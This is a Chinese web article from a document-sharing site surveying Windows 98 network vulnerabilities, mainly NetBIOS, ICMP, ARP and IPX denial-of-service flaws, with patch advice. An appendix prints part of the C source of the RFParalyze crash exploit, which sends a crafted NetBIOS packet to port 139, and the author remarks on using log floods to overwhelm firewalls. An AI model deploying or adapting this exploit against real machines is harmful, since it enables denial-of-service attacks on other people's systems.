您好,欢迎访问三七文档
当前位置:首页 > 商业/管理/HR > 管理学资料 > Win98常见安全漏洞于解决方案
Win98常见安全漏洞于解决方案1、共享密码校验漏洞老漏洞了,绿盟袁哥发现的。微软NETBIOS协议的口令校验服务端在对客户端的口令进行校验时是以客户端发送的长度数据为依据。如果客户端设置数据包中密码长度域为1,并发送一个字节的明文口令给服务端。服务端就会将客户端发来口令与服务端保存的共享口令的第一个字节进行明文比较,如果匹配就认为通过了验证。2、ICMP攻击补丁:关于ICMP攻击的有很多了,WINNUKE、SPING和TEARDROP,比如WINNUKE,可对使用Windows3.11/95/NT操作系统的上网者进行攻击。它可向某一IP地址发送“OOB”(OUTOFBAND)数据,并攻击139端口(NETBIOS),如果攻击者进行端口监听的话,还可攻击其它端口。当被攻击的电脑收到“OOB数据后,即无法对数据进行处理,并出现Internet连接中断或蓝屏幕死机等现象。ICMP通常报告在处理数据报过程中的错误,在以下几种情况下发送:当数据报不能到达目的地时,当网关已经失去缓存功能,当网关能够引导主机在更短路由上发送。一般上网用户可能不用到多少,不知道我理解得对不对,因此可以关闭ICMP。而且shotgun早提出关于ICMP木马的设计思路,台湾的**实现了(具体的程序我忘记了),这种木马可能对于只分析端口的防火墙防范木马简直是绝杀。3、ARP拒绝服务攻击影响WINDOWS98系统,当向运行Windows的主机发送大量无关的ARP数据包时,会导致系统耗尽所有的CPU和内存资源而停止响应。如果向广播地址发送ARP请求时,可能导致整个居域网停止响应。攻击程序见:arpkill4、IPXPing包拒绝服务漏洞由于不正确的通过端口0x456发送一些不规范的IPX/SPXPing包可能导致服务器出现拒绝服务攻击。IPX/SPX协议在Windows98默认安装情况下是没有安装的,而在Windows95默认安装时如果系统检测到网卡后此协议将自动安装。如果IPX/SPX协议被禁止,Windows9x将接受特殊的畸形IPXPing包,而且发送源地址已被修改为广播地址,并且将导致广播紊乱,促使带宽饱和,出现拒绝服务。如果源地址已被修改为广播地址,这样此网段中的每个机器都将响应此Ping请求,如此多的响应将导致网络瘫痪。5、NetBIOS缓存漏洞在Windows95,98,NT4.0,and2000中的NetBIOS高速缓存执行允许远程插入动态缓存条目,而且可以移走动态和静态缓存条目。这是由NetBIOS缓存的实现和CIFS(CommonInternetFileSystem)浏览协议之间的交互引起的。CIFS浏览协议用来生成网络资源的列表,该协议被用在“网上邻居”和“我的网络”等服务中。它还定义了一些浏览帧,这些帧被封装在NetBIOS数据包中。当从138号UDP端口接收到一个浏览帧的请求时,NetBIOS数据包中的信息被提取出来并添加到NetBIOS缓存中。这些信息包括源和目的地的NetBIOS名字、第二源IP地址以及IP头。远程的恶意用户可以通过发送单播或广播类型的UDP数据包,从而使得NetBIOS名字到IP地址的解析进行重定向,在其控制之下转发到任意的IP地址。一旦NetBIOS缓存被UDP数据包破坏,就不再需要预测事务标识(据报道,事务标识是一个很容易预测的16bit的标识)。为了刷新缓存中的动态条目,用户可以发送一个正向名字查询(PositiveNameQuery)响应,在该响应中提供另一个IP地址给NetBIOS名字映射。安全建议:WINDOWS的NETBIOS有很多缺陷,建议对NETBIOS进行安全配置。6、NetBIOS空源主机名导致系统崩溃当Windows95/98收到一个NetBIOS会话的包,这个包中源主机名被设置成NULL,那么将导致发生不可预料的错误:系统崩溃,蓝屏,重起动,死锁或者丢失网络连接等等。攻击程序见:netbios空原主机名.txt7、无效驱动器类型拒绝服务漏洞如果一个MicrosoftWindows9X客户端连接到一个文件/打印共享服务器时,服务器返回一个错误驱动器类型,那么将导致客户端崩溃,必须重新启动来恢复正常正常功能。下列驱动器类型是Windows9X能识别的:1)驱动器号:2)LPTx:3)COMMx4)IPC返回给客户端的所有其他的驱动器类型会引起拒绝服务。8、NetBIOSoverTCP/IP耗尽资源漏洞微软的执行NetBIOS可能由于一个远程开发漏洞而导致拒绝服务攻击。攻击者能够通过连接NBT端口而促使系统耗尽网络资源并停止工作。攻击可通过如下方式来进行:初始化许多连接,然后关闭它们,让目标机器上的TCP管套(socket)处于FINWAIT_1状态。尽管这些管套最终将超时并被释放,但攻击者可以持续地发送更多请求,初始化并关闭新的连接,耗尽任何空闲的网络资源。结果将导致NetBIOS拒绝正常的服务,直到攻击停止。微软在NT4.0sp6中发布了一个补丁来修补该漏洞。简单说来,DDOS攻击基本是无法解决的,我特别喜欢,从SYNFLOOD理论上来说只要是有限带宽的服务都会被攻击到拒绝服务,服务器可能只是拒绝服务,而一般的PC可能就是系统资源耗尽了。而且,大量的DOS攻击可以造成防火墙大量日志,甚至日志满或者日志爆满掉。天网据说是6万记录即满,而6万日志,可以很快就搞定,只要知道天网过滤哪些东西就攻击哪些东西。呵呵,这就是强行突破FIREWALL或者IDS的前奏。解决方法:微软已经针对此漏洞开发了补丁程序,下载地址:=25114其他漏洞:MicrosoftWindowsMediaPlayer.WMZ任意JavaApplet漏洞测试方法:中有详细描述以上内容只是一点简介,限于自己的水平,难免有错,欢迎大家指正。联系:refdom@263.net--------------------------------------------------------------------附:一些测试程序--------------------------------------------------------------------************************************************************netbios空原主机名.txt************************************************************#includestdio.h/*It'ssuchashametowaste*/#includestdlib.h/*thisusablespace.Instead,*/#includestring.h/*we'lljustmakeitmore*/#includenetdb.h/*propstothemenandwomen*/#includesys/socket.h/*(hiTabi!)of#!admand*/#includesys/types.h/*#!w00w00,becausetheyrock*/#includenetinet/in.h/*somuch.Andwecan'tforget*/#includeunistd.h/*ourfriendsateEyeor*/#includestring.h/*Attrition.Oh,+hiSioda.:)*//*MagicwinpopupmessageThisisfrom\\Beav\beavisandsaysyehyehRonandMartyshouldlikethehardcodedvaluesthishas;)*/charblowup[]=\x00\x00\x00\x41\xff\x53\x4d\x42\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\x00\x04\x42\x45\x41\x56\x00\x04\x42\x45\x41\x56\x49\x53\x00\x01\x08\x00\x79\x65\x70\x20\x79\x65\x70\x00\x00;structsreq/*littlestructureofnetbiossessionrequest*/{charfirst[5];charyoname[32];charsep[2];charmyname[32];charend[1];};voidPad_Name(char*name1,char*name2);/*ThanksAntilove/ADM4codez!*/intmain(intargc,char*argv[]){charbuf[4000],myname[33],yoname[33];structsockaddr_insin;intsox,connex,x;structsreqsmbreq;printf(RFParalyze--thiscodebyrfp/ADM/Wiretrip/anddm/el8/\n);if(argc3){printf(Usage:RFParalyzeIPoftargetNetBIOSname\n);printf(--IPmustbeipaddress,notdns\n);printf(--NetBIOSnamemustbeinUPPERCASE\n\n);exit(1);}printf(Greetztoel8.org,Technotronic,w00w00,USSR,andADM!\n);Pad_Name(WICCA,myname);/*greetztoSimpleNomad/NMRC*/myname[30]='A';/*howwasBeltaine?:)*/myname[31]='D';Pad_Name(argv[2],yoname);yoname[30]='A';yoname[31]='D';printf(Trying%sasNetBIOSname%s\n,argv[1],argv[2]);sin.sin_addr.s_addr=inet_addr(argv[1]);sin.sin_family=AF_INET;sin.sin_port=htons(139);sox=socket(AF_INET,SOCK_STREAM,0);if((connex=connect(sox,(structsockaddr_in*)&sin,sizeof(sin)))0){perror(Problemsconnecting:);exit(1);}memset(buf,0,4000);memcpy(smbreq.first,\x81\x00\x00\x44\x20,5);/*variousnetbiosstuffz*/memcpy(smbreq.sep,\x00\x20,2);/*noneedtoworryabout*/memcpy(smbreq.end,\x00,1);/*whatitdoes:)*/strncpy(smbreq.myname,myname,32);strncpy(smbreq.yoname,yoname,32);write(sox,&smbreq,72);/*sendinitialrequest*/x=read(sox,buf,4000);/*gettheirresp
本文标题:Win98常见安全漏洞于解决方案
链接地址:https://www.777doc.com/doc-2856103 .html